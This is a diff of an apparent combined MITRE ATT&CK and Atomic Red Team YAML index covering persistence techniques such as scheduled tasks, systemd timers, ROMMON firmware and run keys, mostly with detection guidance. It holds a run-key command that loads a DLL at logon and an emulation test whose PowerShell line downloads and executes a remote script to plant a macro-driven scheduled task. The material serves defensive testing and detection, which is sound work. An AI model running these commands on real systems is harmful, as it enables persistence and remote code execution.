+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations.
+
+ Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.
+ x_mitre_data_sources:
+ - Process monitoring
+ - Windows Registry
+ - File monitoring
+ - DLL monitoring
+ - API monitoring
+ x_mitre_contributors:
+ - Mathieu Tartare, ESET
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
+ T1542.004:
+ technique:
+ created: '2020-10-20T00:05:48.790Z'
+ modified: '2020-10-22T02:18:19.568Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ id: attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc
+ description: |-
+ Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
+
+
+ ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.
+ name: ROMMONkit
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1542.004
+ url: https://attack.mitre.org/techniques/T1542/004
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ x_mitre_platforms:
+ - Network
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: There are no documented means for defenders to validate the
+ operation of the ROMMON outside of vendor support. If a network device is
+ suspected of being compromised, contact the vendor to assist in further investigation.
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_data_sources:
+ - File monitoring
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ - Packet capture
+ atomic_tests: []
T1037.004:
technique:
id: attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211
@@ -14675,6 +15126,14 @@ persistence:
description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
12, 2014.
source_name: Microsoft Run Key
+ - source_name: Microsoft Wow6432Node 2018
+ url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
+ description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data
+ in the Registry. Retrieved August 3, 2020.
+ - source_name: Malwarebytes Wow6432Node 2016
+ url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/
+ description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved
+ August 3, 2020.
- url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key
description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry
Key. Retrieved June 29, 2018.
@@ -14697,26 +15156,30 @@ persistence:
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
+
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
- The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
+ Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
+
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
+
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
+
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
@@ -14734,9 +15197,9 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T16:16:26.182Z'
+ modified: '2020-08-03T16:30:26.918Z'
created: '2020-01-23T22:02:48.566Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -15211,10 +15674,58 @@ persistence:
>$null 2>&1
'
+ - name: Task Scheduler via VBA
+ auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
+ description: |
+ This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
+ 30 - 40 seconds after this module has run
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\")
+ \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
+ -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
+ name: powershell
T1053:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:46.977Z'
+ modified: '2020-10-14T15:20:01.069Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Scheduled Task/Job
+ description: |-
+ Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
+
+ Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).
external_references:
- source_name: mitre-attack
external_id: T1053
@@ -15226,35 +15737,21 @@ persistence:
description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved
June 8, 2016.
source_name: TechNet Task Scheduler Security
- description: |-
- Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
-
- Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).
- name: Scheduled Task/Job
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-24T13:45:04.006Z'
- created: '2017-05-31T21:30:46.977Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Prashant Verma, Paladion
- - Leo Loobeek, @leoloobeek
- - Travis Smith, Tripwire
- - Alain Homewood, Insomnia Security
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_remote_support: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -15265,19 +15762,18 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_remote_support: true
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
+ x_mitre_contributors:
+ - Prashant Verma, Paladion
+ - Leo Loobeek, @leoloobeek
+ - Travis Smith, Tripwire
+ - Alain Homewood, Insomnia Security
+ x_mitre_version: '2.0'
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1546.002:
technique:
@@ -15457,7 +15953,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-04-17T17:47:57.075Z'
+ modified: '2020-09-16T19:34:19.961Z'
created: '2019-06-28T17:52:07.296Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -15490,9 +15986,9 @@ persistence:
- source_name: mitre-attack
external_id: T1574.010
url: https://attack.mitre.org/techniques/T1574/010
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-17
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/17.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -15510,7 +16006,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:37:28.912Z'
+ modified: '2020-09-16T19:10:04.262Z'
created: '2020-03-12T20:43:53.998Z'
x_mitre_contributors:
- Travis Smith, Tripwire
@@ -15545,9 +16041,9 @@ persistence:
- source_name: mitre-attack
external_id: T1574.011
url: https://attack.mitre.org/techniques/T1574/011
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-478
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/478.html
- source_name: Registry Key Security
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN
description: Microsoft. (2018, May 31). Registry Key Security and Access Rights.
@@ -15598,7 +16094,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:01:09.906Z'
+ modified: '2020-09-16T19:07:48.590Z'
created: '2020-03-13T11:42:14.444Z'
x_mitre_defense_bypassed:
- Application control
@@ -15960,10 +16456,7 @@ persistence:
service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd
functionality to establish persistent access to victim systems by creating
and/or modifying service unit files that cause systemd to execute malicious
- commands at recurring intervals, such as at system boot.(Citation: Anomali
- Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation:
- Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation:
- acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries
+ commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries
typically require root privileges to create/modify service unit files in the
/etc/systemd/system and /usr/lib/systemd/system
directories, low privilege users can create/modify service unit files in directories
@@ -15977,6 +16470,12 @@ persistence:
- source_name: mitre-attack
external_id: T1543.002
url: https://attack.mitre.org/techniques/T1543/002
+ - external_id: CAPEC-550
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/550.html
+ - external_id: CAPEC-551
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/551.html
- source_name: 'Linux man-pages: systemd January 2014'
url: http://man7.org/linux/man-pages/man1/systemd.1.html
description: Linux man-pages. (2014, January). systemd(1) - Linux manual page.
@@ -15989,18 +16488,6 @@ persistence:
url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With
a New Malware Family Written in Golang. Retrieved April 24, 2019.
- - source_name: gist Arch package compromise 10JUL2018
- url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
- description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public
- Arch package compromise. Retrieved April 23, 2019.
- - source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018
- url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
- description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux
- AUR Package Repository. Retrieved April 23, 2019.
- - source_name: acroread package compromised Arch Linux Mail 8JUL2018
- url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
- description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved
- April 23, 2019.
- source_name: Rapid7 Service Persistence 22JUNE2016
url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence
description: Rapid7. (2016, June 22). Service Persistence. Retrieved April
@@ -16011,7 +16498,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T22:13:59.473Z'
+ modified: '2020-10-09T13:46:29.701Z'
created: '2020-01-17T16:15:19.870Z'
x_mitre_platforms:
- Linux
@@ -16025,7 +16512,7 @@ persistence:
- User
- root
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- Process command-line parameters
- Process monitoring
@@ -16100,6 +16587,137 @@ persistence:
rm -rf #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
name: bash
+ T1053.006:
+ technique:
+ id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
+ description: |-
+ Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020)
+
+ Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.
+
+ An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.
+ name: Systemd Timers
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1053.006
+ url: https://attack.mitre.org/techniques/T1053/006
+ - source_name: archlinux Systemd Timers Aug 2020
+ url: https://wiki.archlinux.org/index.php/Systemd/Timers
+ description: archlinux. (2020, August 11). systemd/Timers. Retrieved October
+ 12, 2020.
+ - source_name: 'Linux man-pages: systemd January 2014'
+ url: http://man7.org/linux/man-pages/man1/systemd.1.html
+ description: Linux man-pages. (2014, January). systemd(1) - Linux manual page.
+ Retrieved April 23, 2019.
+ - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux
+ AUR Package Repository. Retrieved April 23, 2019.
+ url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
+ source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018
+ - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public
+ Arch package compromise. Retrieved April 23, 2019.
+ url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
+ source_name: gist Arch package compromise 10JUL2018
+ - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved
+ April 23, 2019.
+ url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
+ source_name: acroread package compromised Arch Linux Mail 8JUL2018
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-14T15:20:00.754Z'
+ created: '2020-10-12T17:50:31.584Z'
+ x_mitre_platforms:
+ - Linux
+ x_mitre_contributors:
+ - SarathKumar Rajendran, Trimble Inc
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: |-
+ Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
+
+ Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.
+
+ Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)
+ x_mitre_permissions_required:
+ - User
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
+ T1542.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1542.005
+ url: https://attack.mitre.org/techniques/T1542/005
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Secure Boot
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure
+ Boot. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Image File Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Image File Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Command History
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command
+ History. Retrieved October 21, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Boot Information
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
+ Information. Retrieved October 21, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: TFTP Boot
+ description: |-
+ Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
+
+ Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)
+ id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ modified: '2020-10-22T16:35:53.806Z'
+ created: '2020-10-20T00:06:56.180Z'
+ x_mitre_data_sources:
+ - Network device run-time memory
+ - Network device command history
+ - Network device configuration
+ - File monitoring
+ - Network device logs
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: |-
+ Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
+
+ Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1547.003:
technique:
external_references:
@@ -16177,6 +16795,8 @@ persistence:
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
+
+ On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
external_references:
- source_name: mitre-attack
external_id: T1205
@@ -16185,6 +16805,18 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: FireEye - Synful Knock
+ url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html
+ description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful
+ Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
@@ -16195,7 +16827,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-07-01T18:27:41.755Z'
+ modified: '2020-10-21T15:30:44.964Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_contributors:
- Josh Day, Gigamon
@@ -16208,12 +16840,13 @@ persistence:
- Linux
- macOS
- Windows
+ - Network
x_mitre_network_requirements: true
x_mitre_detection: Record network packets sent to and from the system, looking
for extraneous packets that do not belong to established flows.
x_mitre_defense_bypassed:
- Defensive network service scanning
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_is_subtechnique: false
atomic_tests: []
T1505.002:
@@ -16388,13 +17021,8 @@ persistence:
name: sh
T1078:
technique:
- id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Valid Accounts
- description: |-
- Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
-
- The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078
@@ -16410,8 +17038,13 @@ persistence:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: |-
+ Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
+
